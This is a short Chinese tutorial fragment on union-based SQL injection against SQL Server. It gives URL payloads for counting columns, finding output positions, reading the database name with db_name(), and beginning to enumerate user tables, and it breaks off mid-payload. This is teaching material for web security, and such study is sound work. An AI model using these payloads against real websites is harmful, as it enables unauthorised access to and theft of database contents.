sql注入之sqlserver联合查询注入

条件: 有显示位 判断列数: ?id=1 order by 3 判断显示位: ?id=1 union select null,null,null 查看数据库: ?id=1 union select 1,‘2’,db_name() 这里注意1,‘2’,db_name()的数据类型必备与数据库存储的数据类型一致 查看数据库有哪些表,U:用户的表 ?id=1 union select null,name
相关文章
相关标签/搜索